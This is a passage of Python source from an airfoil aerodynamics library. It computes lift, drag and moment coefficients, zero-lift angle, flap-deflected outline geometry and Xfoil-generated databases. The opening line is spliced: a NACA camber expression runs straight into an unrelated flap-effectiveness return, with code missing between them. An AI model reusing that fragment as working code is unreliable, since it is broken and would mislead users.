float(naca_des[0])/100\n p = float(naca_des[1])/10\n if p != 0.0:\n y_c_true = np.where(x_space0.19198621771937624, -0.4995016675499485*np.abs(d_f)+1.09589743589744, 1.0)\n return hinge_eff*flap_eff*eps_flap_ideal*d_f\n\n\n def _get_database_data(self, data_index, **kwargs):\n # Returns an interpolated data point from the database.\n # data_index: 0 = CL, 1 = CD, 2 = Cm\n\n # Determine size of query\n max_size = 1\n for dof in self._dof_db_order:\n param = kwargs.get(dof, self._dof_defaults[dof])\n if isinstance(param, np.ndarray):\n max_size = max(max_size, param.shape[0])\n\n # Get params\n param_vals = np.zeros((max_size,self._num_dofs))\n for i, dof in enumerate(self._dof_db_order):\n param_vals[:,i] = kwargs.get(dof, self._dof_defaults[dof])\n\n # Interpolate\n return_val = interp.griddata(self._normed_ind_vars, self._data[:,self._num_dofs+data_index].flatten(), param_vals/self._data_norms, method='linear').flatten()\n #return_val = interp.griddata(self._data[:,:self._num_dofs], self._data[:,self._num_dofs+data_index].flatten(), param_vals, method='linear').flatten()\n\n # Check for going out of bounds\n if np.isnan(return_val).any():\n raise DatabaseBoundsError(self.name, np.argwhere(np.isnan(return_val)).flatten(), kwargs)\n\n # Return\n if max_size == 1:\n return return_val.item()\n else:\n return return_val\n\n\n def get_CL(self, **kwargs):\n \"\"\"Returns the coefficient of lift. Note: all parameters can be given as numpy arrays, in which case a numpy array of the coefficient will be returned.\n To do this, all parameter arrays must have only one dimension and must have the same length.\n\n Parameters\n ----------\n alpha : float, optional\n Angle of attack in radians. Defaults to 0.0.\n\n Rey : float, optional\n Reynolds number.\n\n Mach : float, optional\n Mach number.\n\n trailing_flap_deflection : float, optional\n Trailing flap deflection in radians. Defaults to 0.\n\n trailing_flap_fraction : float, optional\n Trailing flap fraction of the chord length. Defaults to 0.\n\n Returns\n -------\n float or ndarray\n Lift coefficient\n \"\"\"\n \n # Linearized model\n if self._type == \"linear\":\n\n # Get params\n alpha = kwargs.get(\"alpha\", 0.0)\n d_f = kwargs.get(\"trailing_flap_deflection\", 0.0)\n c_f = kwargs.get(\"trailing_flap_fraction\", 0.0)\n\n # Calculate lift coefficient\n if np.array(d_f == 0.0).all() or np.array(c_f == 0.0).all():\n CL = self._CLa*(alpha-self._aL0)\n else:\n delta_a_d_f = self._get_flap_influence(c_f, d_f)\n CL = self._CLa*(alpha-self._aL0+delta_a_d_f)\n \n # Saturate\n with np.errstate(invalid='ignore'):\n if isinstance(CL, np.ndarray):\n CL = np.where((CL > self._CL_max) | (CL < -self._CL_max), np.sign(CL)*self._CL_max, CL)\n elif CL > self._CL_max or CL < -self._CL_max:\n CL = np.sign(CL)*self._CL_max\n\n # Functional model\n elif self._type == \"functional\":\n CL = self._CL(**kwargs)\n\n # Generated/imported database\n elif self._type == \"database\":\n CL = self._get_database_data(0, **kwargs)\n\n # Fits\n elif self._type == \"poly_fit\":\n CL = self._get_polynomial_data(0, **kwargs)\n\n return CL\n\n\n def get_CD(self, **kwargs):\n \"\"\"Returns the coefficient of drag. note: all parameters can be given as numpy arrays, in which case a numpy array of the coefficient will be returned.\n to do this, all parameter arrays must have only one dimension and must have the same length.\n\n Parameters\n ----------\n alpha : float, optional\n Angle of attack in radians. Defaults to 0.0.\n\n Rey : float, optional\n Reynolds number.\n\n Mach : float, optional\n Mach number.\n\n trailing_flap_deflection : float, optional\n Trailing flap deflection in radians. Defaults to 0.\n\n trailing_flap_fraction : float, optional\n Trailing flap fraction of the chord length. Defaults to 0.\n\n Returns\n -------\n float or ndarray\n Drag coefficient\n \"\"\"\n\n # Linear type\n if self._type == \"linear\":\n d_f = kwargs.pop(\"trailing_flap_deflection\", 0.0)\n CL = self.get_CL(**kwargs)\n CD_flap = 0.002*np.abs(np.degrees(d_f)) # A *very* rough estimate for flaps\n CD = self._CD0+self._CD1*CL+self._CD2*CL**2+CD_flap\n\n # Functional model\n elif self._type == \"functional\":\n CD = self._CD(**kwargs)\n\n # Generated/imported database\n elif self._type == \"database\":\n CD = self._get_database_data(1, **kwargs)\n\n # Fits\n elif self._type == \"poly_fit\":\n CD = self._get_polynomial_data(1, **kwargs)\n\n return CD\n\n\n def get_Cm(self, **kwargs):\n \"\"\"Returns the moment coefficient. note: all parameters can be given as numpy arrays, in which case a numpy array of the coefficient will be returned.\n to do this, all parameter arrays must have only one dimension and must have the same length.\n\n Parameters\n ----------\n alpha : float, optional\n Angle of attack in radians. Defaults to 0.0.\n\n Rey : float, optional\n Reynolds number.\n\n Mach : float, optional\n Mach number.\n\n trailing_flap_deflection : float, optional\n Trailing flap deflection in radians. Defaults to 0.\n\n trailing_flap_moment_deriv : float or ndarray, optional\n Change in section moment with respect to trailing flap deflection. Defaults to 0.\n\n trailing_flap_fraction : float, optional\n Trailing flap fraction of the chord length. Defaults to 0.\n\n Returns\n -------\n float or ndarray\n Moment coefficient\n \"\"\"\n\n # Linear type\n if self._type == \"linear\":\n\n # Get parameters\n alpha = kwargs.get(\"alpha\", 0.0)\n d_f = kwargs.get(\"trailing_flap_deflection\", 0.0)\n c_f = kwargs.get(\"trailing_flap_fraction\", 0.0)\n\n # No control deflection\n if np.array(d_f == 0.0).all() or np.array(c_f == 0.0).all():\n Cm = self._CmL0+self._Cma*(alpha-self._aL0)\n else:\n theta_f = np.arccos(2.0*c_f-1.0)\n Cm_df = 0.25*(np.sin(2.0*theta_f)-2.0*np.sin(theta_f))\n Cm = self._CmL0+self._Cma*(alpha-self._aL0)+Cm_df*d_f\n\n # Functional model\n elif self._type == \"functional\":\n Cm = self._Cm(**kwargs)\n\n # Generated/imported database\n elif self._type == \"database\":\n Cm = self._get_database_data(2, **kwargs)\n\n # Fits\n elif self._type == \"poly_fit\":\n Cm = self._get_polynomial_data(2, **kwargs)\n\n return Cm\n\n\n def get_aL0(self, **kwargs):\n \"\"\"Returns the zero-lift angle of attack, taking flap deflection into account.\n\n Parameters\n ----------\n Rey : float, optional\n Reynolds number.\n\n Mach : float, optional\n Mach number.\n\n trailing_flap_deflection : float, optional\n Trailing flap deflection in radians. Defaults to 0.\n\n trailing_flap_fraction : float, optional\n Trailing flap fraction of the chord length. Defaults to 0.\n\n Returns\n -------\n float\n Zero-lift angle of attack\n \"\"\"\n\n # Linear airfoil model\n if self._type == \"linear\":\n\n # Get params\n d_f = kwargs.get(\"trailing_flap_deflection\", 0.0)\n c_f = kwargs.get(\"trailing_flap_fraction\", 0.0)\n\n # Calculate lift coefficient\n if np.array(d_f == 0.0).all() or np.array(c_f == 0.0).all():\n aL0 = self._aL0\n else:\n delta_a_d_f = self._get_flap_influence(c_f, d_f)\n aL0 = self._aL0-delta_a_d_f\n \n return aL0\n\n # Database/poly fit/functional\n # Use secant method in alpha to find a_L0\n elif self._type == \"database\" or self._type == \"poly_fit\" or self._type == \"functional\":\n\n # Remove alpha from kwargs\n kwargs.pop('alpha', None)\n\n # Initialize secant method\n a0 = 0.0\n CL0 = self.get_CL(alpha=a0, **kwargs)\n a0 = np.zeros_like(CL0)\n a1 = np.zeros_like(CL0)+0.01\n CL1 = self.get_CL(alpha=a1, **kwargs)\n a2 = np.zeros_like(CL1)\n\n # If we're outside the domain of the database, aL0 should be nan\n if a2.size == 1:\n if np.isnan(CL1):\n a2 = np.nan\n else:\n a2[np.where(np.isnan(CL1))] = np.nan\n \n # Iterate\n np.seterr(invalid='ignore')\n not_converged = np.where(np.array(np.abs(CL1)>1e-10))[0]\n while not_converged.size>0:\n \n # Update estimate\n if a2.size == 1:\n a2 = (a1-CL1*(a0-a1)/(CL0-CL1))\n else:\n a2[not_converged] = (a1-CL1*(a0-a1)/(CL0-CL1))[not_converged]\n CL2 = self.get_CL(alpha=a2, **kwargs)\n\n # Update for next iteration\n a0 = np.copy(a1)\n CL0 = np.copy(CL1)\n a1 = np.copy(a2)\n CL1 = np.copy(CL2)\n\n # Check convergence\n not_converged = np.where(np.array(np.abs(CL1)>1e-10))[0]\n\n np.seterr()\n return a2\n\n\n def get_CLM(self, **kwargs):\n \"\"\"Returns the lift slope with respect to Mach number using a forward-difference approximation.\n Simply returns 0 for a type 'linear' airfoil.\n\n Parameters\n ----------\n alpha : float, optional\n Angle of attack in radians. Defaults to 0.0.\n\n Rey : float, optional\n Reynolds number.\n\n Mach : float, optional\n Mach number.\n\n trailing_flap_deflection : float, optional\n Trailing flap deflection in radians. Defaults to 0.\n\n trailing_flap_fraction : float, optional\n Trailing flap fraction of the chord length. Defaults to 0.\n\n dx : float\n Step size for finite-difference equation. Defaults to 0.05.\n\n Returns\n -------\n float or ndarray\n Lift slope with respect to Mach number\n \"\"\"\n\n # Linear model\n if self._type == \"linear\":\n return 0.0\n\n # Database\n elif self._type == \"database\" or self._type == \"poly_fit\" or self._type == \"functional\":\n\n # Check the database is dependent on Mach\n if (self._type == \"database\" or self._type == \"poly_fit\") and \"Mach\" not in self._dof_db_order:\n return 0.0\n\n # Get center Mach value\n dx = kwargs.get(\"dx\", 0.05)\n Mach = kwargs.pop(\"Mach\", 0.0)\n \n # Calculate forward and center points (since we'll often be at M=0 and negative M doesn't work)\n CL1 = self.get_CL(Mach=Mach+dx, **kwargs)\n CL0 = self.get_CL(Mach=Mach, **kwargs)\n\n return (CL1-CL0)/dx\n\n\n def get_CLRe(self, **kwargs):\n \"\"\"Returns the lift slope with respect to Reynolds number using a central-difference approximation.\n Simply returns 0 for a type 'linear' airfoil.\n\n Parameters\n ----------\n alpha : float, optional\n Angle of attack in radians. Defaults to 0.0.\n\n Rey : float, optional\n Reynolds number.\n\n Mach : float, optional\n Mach number.\n\n trailing_flap_deflection : float, optional\n Trailing flap deflection in radians. Defaults to 0.\n\n trailing_flap_fraction : float, optional\n Trailing flap fraction of the chord length. Defaults to 0.\n\n dx : float\n Step size for finite-difference equation. Defaults to 1000.\n\n Returns\n -------\n float or ndarray\n Lift slope with respect to Reynolds number\n \"\"\"\n\n # Linear model\n if self._type == \"linear\":\n return 0.0\n\n # Database\n elif self._type == \"database\" or self._type == \"poly_fit\" or self._type == \"functional\":\n\n # Check the database is dependent on Re\n if (self._type == \"database\" or self._type == \"poly_fit\") and \"Rey\" not in self._dof_db_order:\n return 0.0\n\n # Get center Re value\n dx = kwargs.get(\"dx\", 1000)\n Rey = kwargs.pop(\"Rey\", 1000000)\n \n # Calculate forward and backward points\n CL1 = self.get_CL(Rey=Rey+dx, **kwargs)\n CL0 = self.get_CL(Rey=Rey-dx, **kwargs)\n\n return (CL1-CL0)/(2*dx)\n\n\n def get_CLa(self, **kwargs):\n \"\"\"Returns the lift slope using a central-difference approximation.\n\n Parameters\n ----------\n alpha : float, optional\n Angle of attack in radians. Defaults to 0.0.\n\n Rey : float, optional\n Reynolds number.\n\n Mach : float, optional\n Mach number.\n\n trailing_flap_deflection : float, optional\n Trailing flap deflection in radians. Defaults to 0.\n\n trailing_flap_fraction : float, optional\n Trailing flap fraction of the chord length. Defaults to 0.\n\n dx : float, optional\n Step size for finite-difference equation. Defaults to 0.001 radians.\n\n Returns\n -------\n float or ndarray\n Lift slope\n \"\"\"\n\n # Linear model\n if self._type == \"linear\":\n return self._CLa\n\n # Database\n elif self._type == \"database\" or self._type == \"poly_fit\" or self._type == \"functional\":\n\n # Check the database is dependent on alpha\n if (self._type == \"database\" or self._type == \"poly_fit\") and \"alpha\" not in self._dof_db_order:\n return 0.0\n\n # Get center alpha value\n dx = kwargs.get(\"dx\", 0.001)\n alpha = kwargs.pop(\"alpha\", 0.0)\n \n # Calculate forward and backward points\n CL1 = self.get_CL(alpha=alpha+dx, **kwargs)\n CL0 = self.get_CL(alpha=alpha-dx, **kwargs)\n\n return (CL1-CL0)/(2*dx)\n\n\n def get_thickness(self, x):\n \"\"\"Returns the thickness normal to the camber line at the specified x location(s).\n\n Parameters\n ----------\n x : float or ndarray\n x location(s) at which to get the thickness.\n\n Returns\n -------\n float or ndarray\n Thickness as a percentage of the chord.\n \"\"\"\n if isinstance(x, float):\n return self._thickness(x).item()\n else:\n return self._thickness(x)\n\n\n def get_max_thickness(self):\n \"\"\"Returns the maximum thickness of the airfoil, divided by the chord length.\n \"\"\"\n return self._max_thickness\n\n\n def get_camber(self, x):\n \"\"\"Returns the y coordinate(s) of the camber line at the specified x location(s).\n\n Parameters\n ----------\n x : float or ndarray\n x location(s) at which to get the thickness.\n\n Returns\n -------\n float or ndarray\n Camber line y coordinate(s) as a percentage of the chord.\n \"\"\"\n if isinstance(x, float):\n return self._camber_line(x).item()\n else:\n return self._camber_line(x)\n\n\n def get_max_camber(self):\n \"\"\"Returns the maximum camber of the airfoil, divided by the chord length.\n \"\"\"\n return self._max_camber\n\n\n def get_outline_points(self, **kwargs):\n \"\"\"Returns an array of outline points showing the geometry of the airfoil.\n\n Parameters\n ----------\n N : int, optional\n The number of outline points to return. This function will not always return exactly this many\n but never more. Defaults to 200.\n\n cluster : bool, optional\n Whether to cluster points about the leading and trailing edges. Defaults to True.\n\n trailing_flap_deflection : float, optional\n Trailing flap deflection in radians (positive down). Defaults to zero.\n\n trailing_flap_fraction : float, optional\n Trailing flap fraction of the chord. Defaults to zero.\n\n export : str, optional\n If specified, the outline points will be saved to a file. Defaults to no file.\n\n top_first : bool, optional\n The order of the coordinates when exported. Defaults to going from the trailing edge along the top and\n the around to the bottom.\n\n close_te : bool, optional\n Whether the top and bottom trailing edge points should be forced to be equal. Defaults to False\n\n plot : bool, optional\n Whether a plot of the outline points should be displayed once computed. Defaults to False.\n\n original_points : bool, optional\n Whether this should simply return the original inputted points. If set to True, all other kwargs relating\n to the geometry will be ignored. Defaults to False.\n\n Returns\n -------\n ndarray\n Outline points in airfoil coordinates.\n \"\"\"\n\n # Check the geometry has been defined\n if self.geom_specification != \"none\":\n\n # Get kwargs\n N = kwargs.get(\"N\", 200)\n cluster = kwargs.get(\"cluster\", True)\n trailing_flap_deflection = kwargs.get(\"trailing_flap_deflection\", 0.0)\n trailing_flap_fraction = kwargs.get(\"trailing_flap_fraction\", 0.0)\n close_te = kwargs.get(\"close_te\", False)\n\n if not kwargs.get(\"original_points\", False):\n \n # Zach's method of determining NACA airfoils with deflected parabolic flaps (actually works really well for all of them...)\n\n # Get flap parameters\n d_f = trailing_flap_deflection\n x_f = 1.0-trailing_flap_fraction\n y_f = self._input_dict.get(\"trailing_flap_hinge_height\", self._camber_line(x_f))\n \n # Calculate distributions\n theta_c = np.linspace(np.pi, -np.pi, N) # Loop over entire airfoil from TE->top->LE->bottom->TE\n if cluster:\n x_c = 0.5*(1.0-np.cos(theta_c))\n else:\n x_c = abs(np.linspace(-1.0, 1.0, N))\n \n # Calculate undeformed camber line and thickness\n y_c = self._camber_line(x_c)\n t = self._thickness(x_c)\n dyc_dx = self._camber_deriv(x_c)\n \n if d_f != 0.0 and x_f < 1.0:\n # Determine which camber points belong to the flap\n flap_ind = np.where(x_c>x_f)\n\n # Linear flap\n if self._trailing_flap_type == \"linear\":\n\n # Calculate deflected camber line Eqs. (8-10) in \"Geometry and Aerodynamic Performance of Parabolic...\" by Hunsaker, et al. 2018\n r = np.sqrt((y_c-y_f)*(y_c-y_f)+(x_c-x_f)*(x_c-x_f))\n psi = np.arctan((y_c-y_f)/(x_c-x_f))\n x_c[flap_ind] = x_f+(r*np.cos(d_f-psi))[flap_ind]\n y_c[flap_ind] = y_f-(r*np.sin(d_f-psi))[flap_ind]\n dyc_dx[flap_ind] = np.gradient(y_c[flap_ind], x_c[flap_ind], edge_order=2)\n\n else:\n # Parabolic flap from \"Geometry and Aerodynamic Performance of Parabolic...\" by Hunsaker, et al. 2018\n\n # Calculate the neutral line parameters\n l_n = np.sqrt(y_f*y_f+(1-x_f)*(1-x_f))\n phi_n = -np.arctan2(y_f, 1-x_f)\n\n # Calculate the location of the deflected trailing edge\n tan_df = np.tan(d_f)\n R = np.sqrt(4*tan_df*tan_df+1)+np.arcsinh(2*tan_df)/(2*tan_df)\n E_te = 2.0*l_n/R\n\n # Find E_p using secant method\n\n # Constants\n R_tan_df = R*tan_df\n R_tan_df2 = R_tan_df*R_tan_df\n E_0 = ((x_c-x_f)/(1-x_f)*l_n)[flap_ind]\n\n # Initial guesses\n E_p0 = E_te*E_0/l_n\n R0 = E_p0/2*np.sqrt(E_p0**2/l_n**2*R_tan_df2+1)+l_n/(2*R_tan_df)*np.arcsinh(E_p0/l_n*R_tan_df)-E_0\n E_p1 = E_te*E_0/l_n+0.001\n R1 = E_p1/2*np.sqrt(E_p1**2/l_n**2*R_tan_df2+1)+l_n/(2*R_tan_df)*np.arcsinh(E_p1/l_n*R_tan_df)-E_0\n\n # Suppress warnings because an error will often occur within the np.where that has no effect on computation\n with np.errstate(invalid='ignore'):\n \n # Iterate\n while (abs(R1)>1e-10).any():\n\n # Update value\n E_p2 = np.where(np.abs(R0-R1) != 0.0, E_p1-R1*(E_p0-E_p1)/(R0-R1), E_p1)\n\n # Get residual\n R2 = E_p2/2*np.sqrt(E_p2**2/l_n**2*R_tan_df2+1)+l_n/(2*R_tan_df)*np.arcsinh(E_p2/l_n*R_tan_df)-E_0\n\n # Update for next iteration\n E_p0 = E_p1\n R0 = R1\n E_p1 = E_p2\n R1 = R2\n\n # Store final result\n E_p = E_p1\n n_p = -E_p*E_p/E_te*tan_df\n\n # Calculate deflected neutral line\n x_p = x_f+E_p*np.cos(phi_n)-n_p*np.sin(phi_n)\n y_p = y_f+E_p*np.sin(phi_n)+n_p*np.cos(phi_n)\n y_nl = y_f*(1-(x_c-x_f)/(1.0-x_f))\n dy_c = (y_c-y_nl)[flap_ind]\n\n # Calculate deflected camber line\n C = np.arctan(2*E_p/E_te*tan_df)\n x_c[flap_ind] = x_p+dy_c*np.sin(C)\n y_c[flap_ind] = y_p+dy_c*np.cos(C)\n\n dyc_dx[flap_ind] = (dyc_dx[flap_ind] - 2*E_p*tan_df/E_te) / (1 + 2*E_p*tan_df/E_te*dyc_dx[flap_ind])\n\n # Outline points\n X = x_c-t*np.sin(np.arctan(dyc_dx))*np.sign(theta_c)\n Y = y_c+t*np.cos(np.arctan(dyc_dx))*np.sign(theta_c)\n\n # Trim overlapping points from linear flap deflection\n if self._trailing_flap_type == \"linear\" and d_f != 0.0 and x_f < 1.0:\n\n # Get indices of top and bottom points\n top_ind = theta_c > 0.0\n bot_ind = theta_c <= 0.0\n\n # Split points into top and bottom\n X_t = X[top_ind]\n Y_t = Y[top_ind]\n X_b = X[bot_ind]\n Y_b = Y[bot_ind]\n\n # Find the point on the surface where the hinge breaks\n # These equations determine the slope of the line bisecting the angle between the camber line before the flap\n # and the camber line of the flap\n psi_prime = np.pi+np.arctan(self._camber_deriv(x_f)) # Angle to the camber line before the flap\n d_f_prime = -d_f+np.arctan(self._camber_deriv(x_f)) # Angle to the camber line after the flap\n phi = 0.5*(psi_prime+d_f_prime)\n b = np.tan(phi)\n x_t_break, y_t_break, _ = self._get_intersection_point(x_f, y_f, b, \"top\")\n x_b_break, y_b_break, _ = self._get_intersection_point(x_f, y_f, b, \"bottom\")\n\n # Trim overlapping points off of both surfaces\n X_b, Y_b, num_trimmed_from_bot = self._trim_surface(X_b, Y_b, \"forward\")\n X_t, Y_t, num_trimmed_from_top = self._trim_surface(X_t, Y_t, \"backward\")\n\n # Check if we need to fill anything in so the number of outline points remains the same\n if num_trimmed_from_bot>0:\n r_t = self._get_cart_dist(x_t_break, y_t_break, x_f, y_f)\n X_t, Y_t = self._fill_surface(X_t, Y_t, x_f, y_f, r_t, x_t_break, num_trimmed_from_bot, \"backward\")\n\n if num_trimmed_from_top>0:\n r_b = self._get_cart_dist(x_b_break, y_b_break, x_f, y_f)\n X_b, Y_b = self._fill_surface(X_b, Y_b, x_f, y_f, r_b, x_b_break, num_trimmed_from_top, \"forward\")\n\n # Concatenate top and bottom points\n X = np.concatenate([X_t, X_b])\n Y = np.concatenate([Y_t, Y_b])\n\n # Make sure the trailing edge is sealed\n if close_te:\n x_te = 0.5*(X[0]+X[-1])\n y_te = 0.5*(Y[0]+Y[-1])\n X[0] = x_te\n Y[0] = y_te\n X[-1] = x_te\n Y[-1] = y_te\n\n # Just use the original points\n else:\n X = self._raw_outline[:,0]\n Y = self._raw_outline[:,1]\n\n # Plot result\n if kwargs.get(\"plot\", False):\n plt.figure()\n plt.plot(X, Y)\n #plt.plot(x_t_break, y_t_break, 'rx')\n #plt.plot(x_b_break, y_b_break, 'rx')\n #plt.plot(x_f, y_f, 'rx')\n plt.plot(x_c, y_c, 'r--')\n plt.xlabel('x')\n plt.ylabel('y')\n plt.title(self.name)\n plt.gca().set_aspect('equal', adjustable='box')\n plt.show()\n\n # Concatenate x and y\n outline_points = np.concatenate([X[:,np.newaxis], Y[:,np.newaxis]], axis=1)\n if not kwargs.get(\"top_first\", True):\n outline_points = outline_points[::-1,:]\n \n # Save to file\n export = kwargs.get(\"export\", None)\n if export is not None:\n np.savetxt(export, outline_points, fmt='%10.8f')\n\n return outline_points\n\n else:\n raise RuntimeError(\"The geometry has not been defined for airfoil {0}. Outline points cannot be generated.\".format(self.name))\n\n\n def _trim_surface(self, X, Y, direction):\n # Trims any points within a region of doubling back in x\n\n # Loop through points\n trim_indices = []\n rev = False\n fwd = False\n\n # Determine direction\n indices = range(X.shape[0])\n if direction == \"backward\":\n indices = indices[::-1]\n \n # Loop through points\n trim_indices = []\n i_prev = 0\n for i in indices:\n \n # Skip first third of the section so we don't end up trimming off the nose\n if X[i] < 0.3:\n continue\n\n # Check if we've started going backwards\n if not rev and X[i] < X[i_prev]:\n rev = i_prev\n\n # Check if we've started going forward again\n if rev and not fwd and X[i] > X[i_prev]:\n fwd = i_prev\n break\n\n i_prev = i\n \n # Trim and insert\n if rev and fwd:\n\n # Determine where to trim\n if direction == \"forward\":\n trim_indices = list(range(rev, fwd+1))\n else:\n trim_indices = list(range(fwd, rev+1))\n\n # Trim\n X = np.delete(X, trim_indices)\n Y = np.delete(Y, trim_indices)\n\n return X, Y, len(trim_indices)\n \n else:\n return X, Y, 0\n\n\n\n def _fill_surface(self, X, Y, x_h, y_h, r, x_break, num_points, direction):\n # Fills in num_points along the arc defined by x_h, y_h, and r\n\n # Determine direction\n indices = range(X.shape[0])\n if direction == \"backward\":\n indices = indices[::-1]\n\n # Find the two points we need to fill in between\n for i in indices:\n \n # Skip first third of the section\n if X[i] < 0.3:\n continue\n\n if X[i] > x_break:\n fill_start = i-1\n fill_stop = i\n break\n\n # No filling needed, apparently...\n else:\n return X, Y\n\n # Get angles from the hinge point to the start and stop points\n theta0 = math.atan2(Y[fill_start]-y_h, X[fill_start]-x_h)\n theta1 = math.atan2(Y[fill_stop]-y_h, X[fill_stop]-x_h)\n\n # Find fill in points\n theta_fill = np.linspace(theta0, theta1, num_points+2)[1:-1]\n x_fill = x_h+r*np.cos(theta_fill)\n y_fill = y_h+r*np.sin(theta_fill)\n\n return np.insert(X, fill_stop, x_fill), np.insert(Y, fill_stop, y_fill)\n\n\n def _get_closest_point_on_surface(self, x, y, surface):\n # Finds the point on the surface of the airfoil which is closest to the given point using Golden section search\n # Returns the coordinates and the radius from the given point\n\n # Decide where to start in s\n if surface == \"top\":\n s0 = 0.0\n s3 = 0.5\n else:\n s0 = 0.5\n s3 = 1.0\n\n # Get Golden ratio\n R = 2.0/(1.0+math.sqrt(5.0))\n\n # Loop until interval converges\n while abs(s0-s3)>1e-10:\n \n # Get interior points\n diff = s3-s0\n s1 = s3-diff*R\n s2 = s0+diff*R\n\n # Calculate points\n x1 = self._x_outline(s1)\n y1 = self._y_outline(s1)\n x2 = self._x_outline(s2)\n y2 = self._y_outline(s2)\n \n # Calculate distances\n d1 = self._get_cart_dist(x, y, x1, y1)\n d2 = self._get_cart_dist(x, y, x2, y2)\n\n # Check\n if d1 < d2:\n s3 = s2\n else:\n s0 = s1\n\n return x1, y1, d1\n\n\n def _get_cart_dist(self, x0, y0, x1, y1):\n x_diff = x0-x1\n y_diff = y0-y1\n return math.sqrt(x_diff*x_diff+y_diff*y_diff)\n\n\n def generate_database(self, **kwargs):\n \"\"\"Makes calls to Xfoil to calculate CL, CD, and Cm as a function of each given degree of freedom.\n\n Parameters\n ----------\n degrees_of_freedom : dict\n A dict specifying which degrees of freedom the database should perturb. Allowable degrees of \n freedom are \"alpha\", \"Rey\", \"Mach\", \"trailing_flap_deflection\", and \"trailing_flap_fraction\".\n\n Each key should be one of these degrees of freedom. To specify a range for the degree of freedom,\n a dictionary with the following keys should be given:\n\n \"range\" : list\n The lower and upper limits for this DOF.\n\n \"steps\" : int\n The number of points in the range to interrogate.\n\n \"index\" : int\n Index of the column for this degree of freedom in the database.\n\n \"log_step\" : bool, optional\n Whether the steps in this dof should be spaced linearly (False) or logarithmically\n (True). Defaults to False.\n\n If instead of perturbing a variable, you want the database to be evaluated at a constant value of\n that variable, a float should be given instead of a dictionary. That variable will then not be considered\n a degree of freedom of the database and will not appear in the database.\n \n An example is shown below:\n\n dofs = {\n \"alpha\" : {\n \"range\" : [math.radians(-15.0), math.radians(15.0)],\n \"steps\" : 21,\n \"index\" : 1\n },\n \"Rey\" : 2900000.0,\n \"trailing_flap_deflection\" : {\n \"range\" : [math.radians(-20.0), math.radians(20.0)],\n \"steps\" : 1,\n \"index\" : 0\n },\n \"trailing_flap_fraction\" : 0.25\n }\n\n The above input will run the airfoil through angles of attack from -15 to 15 degrees at a Reynolds number\n of 2900000.0 and through flap deflections from -20 to 20 degrees with a chord fraction of 25%.\n\n If a float, the degree of freedom is assumed to be constant at that value.\n \n If not specified, each degree of freedom defaults to the following:\n\n \"alpha\" : 0.0\n\n \"Rey\" : 1000000.0\n\n \"Mach\" : 0.0\n\n \"trailing_flap_deflection\" : 0.0\n\n \"trailing_flap_fraction\" : 0.0\n\n Please note that all angular degreees of freedom are in radians, rather than degrees.\n\n Currently, the number of steps in Reynolds number multiplied by the number of steps in Mach number\n may not exceed 12. This is due to internal limitations in Xfoil. However, due to the weak dependence\n of airfoil properties on Reynolds number, we do not expect this to be a great hinderance.\n\n N : int, optional\n Number of panel nodes for Xfoil to use. Defaults to 200.\n\n max_iter : int, optional\n Maximum iterations for Xfoil. Defaults to 100.\n\n x_trip : float or list, optional\n x location, non-dimensionalized by the chord length, of the boundary layer trip position. This is \n specified for the top and bottom of the airfoil. If a float, the value is the same for the top\n and the bottom. If a list, the first list element is the top trip location and the second list element\n is the bottom trip location. Defaults to 1.0 for both.\n\n visc : bool, optional\n Whether to include viscosity. Defaults to True.\n\n N_crit : float, optional\n Critical amplification exponent for the boundary layer in Xfoil. Defaults to 9.0.\n\n update_type : bool, optional\n Whether to update the airfoil to use the newly computed database for calculations. Defaults to True.\n\n show_xfoil_output : bool, optional\n Display whatever Xfoil prints out. Defaults to False.\n\n show_xfoil_plots : bool, optional\n Display Xfoil plots. Defaults to True.\n\n resize_xfoil_window : float, optional\n resizes the xfoil window to screen size fraction. Xfoil defaults to 0.8 window/screen size.\n This variable defaults to None. Has no effect if show_xfoil_plots is False.\n\n CD_type : str, optional\n Which drag coefficient to read in. May be 'total', 'friction', or 'pressure'.\n Defaults to 'total'.\n\n verbose : bool, optional\n Defaults to True\n \"\"\"\n\n # Set up lists of independent vars\n xfoil_args = {}\n self._dof_db_cols = {}\n num_total_runs = 1\n for dof, params in kwargs.pop(\"degrees_of_freedom\", {}).items():\n if dof not in self._allowable_dofs:\n raise IOError(\"{0} is not an allowable DOF.\".format(dof))\n vals, column_index = self._setup_ind_var(params)\n xfoil_args[dof] = vals\n num_total_runs *= len(vals)\n if column_index is not None:\n self._dof_db_cols[dof] = column_index\n\n # Get coefficients\n CL, CD, Cm = self.run_xfoil(**xfoil_args, **kwargs)\n\n # Determine the rows and cols in the database; each independent var and coefficient is a column to be iterpolated using scipy.interpolate.griddata\n self._num_dofs = len(list(self._dof_db_cols.keys()))\n num_cols = 3+self._num_dofs\n num_rows = CL.size-np.count_nonzero(np.isnan(CL))\n dof_sorted = sorted(self._dof_db_cols.items(), key=operator.itemgetter(1))\n self._dof_db_order = [x[0] for x in dof_sorted]\n\n # Arrange into 2D database\n self._data = np.zeros((num_rows, num_cols))\n database_row = 0\n coef_shape = CL.shape\n\n for i in range(coef_shape[0]):\n for j in range(coef_shape[1]):\n for k in range(coef_shape[2]):\n for l in range(coef_shape[3]):\n for m in range(coef_shape[4]):\n\n # Check for nan\n if np.isnan(CL[i,j,k,l,m]):\n continue\n\n # Append independent vars to database\n for n, dof in enumerate(self._dof_db_order):\n if dof == \"alpha\":\n ind = i\n elif dof == \"Rey\":\n ind = j\n elif dof == \"Mach\":\n ind = k\n elif dof == \"trailing_flap_deflection\":\n ind = l\n else:\n ind = m\n self._data[database_row,n] = xfoil_args[dof][ind]\n \n # Append coefficients\n self._data[database_row,self._num_dofs] = CL[i,j,k,l,m]\n self._data[database_row,self._num_dofs+1] = CD[i,j,k,l,m]\n self._data[database_row,self._num_dofs+2] = Cm[i,j,k,l,m]\n\n database_row += 1\n\n # Sort by columns so the first column is perfectly in order\n dtype = \",\".join(['i8' for i in range(num_cols)])\n for i in range(self._num_dofs,-1,-1):\n self._data = self._data[self._data[:,i].argsort(axis=0, kind='stable')] # 'stable' option is necessary to maintain ordering of columns not being actively sorted\n\n # Let the user know how much of the design space we actually got results for\n if kwargs.get(\"verbose\", True):\n percent_success = round(self._data.shape[0]/num_total_runs*100, 2)\n print(\"\\nDatabase generation complete.\")\n print(\"Convergent results obtained from Xfoil for {0}% of the requested points.\".format(percent_success))\n\n # Update type\n if kwargs.get(\"update_type\", True):\n self.set_type(\"database\")\n\n\n def _setup_ind_var(self, input_dict):\n # Sets up a range of independent variables\n\n # Constant value\n if isinstance(input_dict, float):\n lower = input_dict\n upper = input_dict\n N = 1\n index = None\n log_step = False\n\n # Range\n else:\n limits = input_dict.get(\"range\")\n lower = limits[0]\n upper = limits[1]\n N = 